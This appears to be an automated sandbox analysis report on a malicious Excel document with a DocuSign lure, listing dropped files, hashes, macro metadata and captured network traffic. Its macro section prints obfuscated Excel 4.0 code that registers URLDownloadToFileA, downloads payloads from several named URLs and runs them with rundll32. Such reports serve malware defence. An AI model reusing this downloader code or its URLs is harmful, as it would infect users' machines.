Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\TarE18B.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Feb 24 18:53:37 2021, atime=Wed Feb 24 18:53:37 2021, length=16384, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.484286352929908
Encrypted:	false
SSDEEP:	12:85QPYJKLgXg/XAlCPCHaXtB8XzB/q0V8vX+WnicvbASbDtZ3YilMMEpxRljKQgTg:850l/XTd6jI0KvYeM+Dv3qRMrNru/
MD5:	C3DF441E3A0FAA3865D6CBE65AE80420
SHA1:	C8ADC68C8F216B0CE53988B7C776BF74D910C2AB
SHA-256:	F46B8231349682FC73826208C6B3E319F1CEB297B587D44DE25EB674D6B146F6
SHA-512:	AFE05879C5100952D22CB77BD51354AB1F695481A0AB6E892953410D6ABB183AA1AB0AEE594A0E897845753620E4FA295AE8C9F4B04DDEA3F259D345C033599B
Malicious:	false
Preview:	L..................F...........7G...............@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....XR....Desktop.d......QK.XXR....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......494126..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.XF.AShadow.4960.21593.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Feb 24 18:53:26 2021, mtime=Wed Feb 24 18:53:37 2021, atime=Wed Feb 24 18:53:37 2021, length=57856, window=hide
Category:	dropped
Size (bytes):	2308
Entropy (8bit):	4.583571527650622
Encrypted:	false
SSDEEP:	48:8Z//XT0jCH57SrHlRMQh2Z//XT0jCH57SrHlRMQ/:8Z//XojCkxRMQh2Z//XojCkxRMQ/
MD5:	D3B67CEA335F33DF91E53F7DCA864414
SHA1:	54978D6415E1E62EAEA254652D2494C424AB37C5
SHA-256:	3004BAFFD2BB3F98B8B1D4AD377C26211E10C5B00DC2A935E1149412218B71C0
SHA-512:	64D929D5E5BDF9263E5798445D367C5F69833AADF7F2C3EF9E293BA5802E51D31E151D30ACDFD9D5E0DCD3CBFA1710F8D0E3BE00B2C92F77BC47EB2A0DFC701D
Malicious:	false
Preview:	L..................F.... .....D...........^...................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....XR....Desktop.d......QK.XXR....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..:..XR.. .SECURI~1.XLS.........XR..XR.....H.....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...X.F...A.S.h.a.d.o.w...4.9.6.0...2.1.5.9.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop\SecuriteInfo.com.XF.AShadow.4960.21593.xls.A.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...X.F...A.S.h.a.d.o.w...4.9.6.0...2.1.5.9.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	167
Entropy (8bit):	5.11643252492809
Encrypted:	false
SSDEEP:	3:oyBVomM0biqoJL6ThEYYuscbiqoJL6ThEYYmM0biqoJL6ThEYYv:dj60TImVFTImVK0TImVC
MD5:	ABDABA003B0855E784BF8E5C8143E3C2
SHA1:	CE8D3FD2812648611BE370DE329A28DE3C384FAC
SHA-256:	58685D6ED989BA45D0EC74987746F18F04469041C6CEE708A13AE3C1DBB979B8
SHA-512:	AF8325DFE0E0E79F01441B741AAD0BF3853DEB6CD64877B1965D6EEE3670E5DAFC1049ED356EE2921E2374AB0F07998CC017032C1D9BA5C0F7B7EA2DB743AB09
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..SecuriteInfo.com.XF.AShadow.4960.21593.LNK=0..SecuriteInfo.com.XF.AShadow.4960.21593.LNK=0..[xls]..SecuriteInfo.com.XF.AShadow.4960.21593.LNK=0..

C:\Users\user\Desktop\5BCE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	88220
Entropy (8bit):	6.54997160698009
Encrypted:	false
SSDEEP:	1536:rP8rmjAItyzElBIL6lECbgBGGP5xLmQWVxd7f85oaGzeNlz5QaGzeNlfFYVcDZKI:rP8rmjAItyzElBIL6lECbgBGGP5xLm7M
MD5:	449C40C978932029A37F12CC14C9D86D
SHA1:	1DD9186CCEC79A0B8438753630EF43838A771E7A
SHA-256:	76630998E370E064979B7DC9B33DB6CA7E8C0A211B4A4DEE89F197D96C977B57
SHA-512:	2059D9A2CCE52E90DE440C5874315A7A0C4FF55C4EB58588D043E738224A99C4B5FF974C8C08484BA62069FF173FDDA81104BD1537443AED1BDBC5A0A42A25A8
Malicious:	false
Preview:	........g2..........................\.p....user B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 18 13:42:21 2021, Security: 0
Entropy (8bit):	3.697666945848156
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	SecuriteInfo.com.XF.AShadow.4960.21593.xls
File size:	145920
MD5:	b00ae2a23ee80960d42e155f9814b490
SHA1:	7673823a676d34a46128f8f6d7f09e8b2f3d8db4
SHA256:	80d0f40411596b3f2350399c4d76f19d892771f835c1b2f6e3c77955e72e784f
SHA512:	dca45ca42b21b954196f501d1d4396fb221d3e92c50cea599f8bb096e0acfe48428370a040d35a0da2ec268e32c26ff7d1adab862aecca9ae92838028646391a
SSDEEP:	3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMRt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/1:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOMU
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "SecuriteInfo.com.XF.AShadow.4960.21593.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:
Last Saved By:	Friner
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2021-02-18 13:42:21
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.321292606979
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.2746714277
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . \| . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135085

General
Stream Path:	Book
File Type:	Applesoft BASIC program data, first line number 8
Stream Size:	135085
Entropy:	3.69042254796
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . .
Data Raw:	09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,=HALT(),,,,,,,,,,,

,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",rzminc.com/xklyulyijvn/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",pathinanchilearthmovers.com/eznwcdhx/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",jugueterialatorre.com.ar/xjzpfwc/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",rzminc.com/fdzgprclatqo/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",biblicalisraeltours.com/otmchxmxeg/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

Total Packets: 59
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2021 11:54:13.697228909 CET	49167	80	192.168.2.22	72.52.227.180
Feb 24, 2021 11:54:13.847944021 CET	80	49167	72.52.227.180	192.168.2.22
Feb 24, 2021 11:54:13.848059893 CET	49167	80	192.168.2.22	72.52.227.180
Feb 24, 2021 11:54:13.848664999 CET	49167	80	192.168.2.22	72.52.227.180
Feb 24, 2021 11:54:13.999258041 CET	80	49167	72.52.227.180	192.168.2.22
Feb 24, 2021 11:54:14.320781946 CET	80	49167	72.52.227.180	192.168.2.22
Feb 24, 2021 11:54:14.320823908 CET	80	49167	72.52.227.180	192.168.2.22
Feb 24, 2021 11:54:14.321048975 CET	49167	80	192.168.2.22	72.52.227.180
Feb 24, 2021 11:54:14.321799994 CET	49167	80	192.168.2.22	72.52.227.180
Feb 24, 2021 11:54:14.472290993 CET	80	49167	72.52.227.180	192.168.2.22
Feb 24, 2021 11:54:14.500850916 CET	49168	80	192.168.2.22	162.241.80.6
Feb 24, 2021 11:54:14.659456015 CET	80	49168	162.241.80.6	192.168.2.22
Feb 24, 2021 11:54:14.659682035 CET	49168	80	192.168.2.22	162.241.80.6
Feb 24, 2021 11:54:14.660200119 CET	49168	80	192.168.2.22	162.241.80.6
Feb 24, 2021 11:54:14.826414108 CET	80	49168	162.241.80.6	192.168.2.22
Feb 24, 2021 11:54:15.358295918 CET	80	49168	162.241.80.6	192.168.2.22
Feb 24, 2021 11:54:15.358560085 CET	49168	80	192.168.2.22	162.241.80.6
Feb 24, 2021 11:54:15.753170967 CET	49169	80	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:16.041574955 CET	80	49169	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:16.041765928 CET	49169	80	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:16.042413950 CET	49169	80	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:16.330919981 CET	80	49169	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:16.467619896 CET	80	49169	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:16.467663050 CET	80	49169	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:16.467823029 CET	49169	80	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:16.479756117 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:16.777595043 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:16.777699947 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:16.788238049 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:17.085958004 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:17.087625027 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:17.087649107 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:17.087672949 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:17.087884903 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:17.102488041 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:17.400794983 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:17.401002884 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:19.178481102 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:19.516464949 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:20.358824968 CET	80	49168	162.241.80.6	192.168.2.22
Feb 24, 2021 11:54:20.359031916 CET	49168	80	192.168.2.22	162.241.80.6
Feb 24, 2021 11:54:21.342526913 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.342566013 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.342581987 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.342607021 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.342655897 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.342690945 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.342792988 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.342833996 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.342837095 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.342890978 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.342922926 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.342922926 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.342982054 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.343056917 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.343153000 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.344804049 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.344891071 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.350811958 CET	49174	80	192.168.2.22	72.52.227.180
Feb 24, 2021 11:54:21.374596119 CET	80	49169	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.374665976 CET	49169	80	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.506086111 CET	80	49174	72.52.227.180	192.168.2.22
Feb 24, 2021 11:54:21.506186008 CET	49174	80	192.168.2.22	72.52.227.180
Feb 24, 2021 11:54:21.507049084 CET	49174	80	192.168.2.22	72.52.227.180
Feb 24, 2021 11:54:21.640588999 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.640621901 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.640722990 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.640769005 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.640809059 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.640829086 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.640887022 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.640904903 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.640928984 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.640930891 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.640933037 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.640942097 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.640968084 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.640970945 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.640974045 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.641050100 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.641051054 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.641068935 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.641081095 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.641093969 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.641107082 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.641130924 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.641132116 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.641145945 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.641149044 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.641153097 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.641165018 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.641192913 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.641202927 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.641206980 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.641212940 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.641225100 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.641246080 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.641272068 CET	49170	443	192.168.2.22	138.36.237.100
Feb 24, 2021 11:54:21.641278028 CET	443	49170	138.36.237.100	192.168.2.22
Feb 24, 2021 11:54:21.641282082 CET	49170	443	192.168.2.22	138.36.237.100

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2021 11:54:13.501976013 CET	52197	53	192.168.2.22	8.8.8.8
Feb 24, 2021 11:54:13.675236940 CET	53	52197	8.8.8.8	192.168.2.22
Feb 24, 2021 11:54:14.341540098 CET	53099	53	192.168.2.22	8.8.8.8
Feb 24, 2021 11:54:14.498265982 CET	53	53099	8.8.8.8	192.168.2.22
Feb 24, 2021 11:54:15.374135971 CET	52838	53	192.168.2.22	8.8.8.8
Feb 24, 2021 11:54:15.749438047 CET	53	52838	8.8.8.8	192.168.2.22
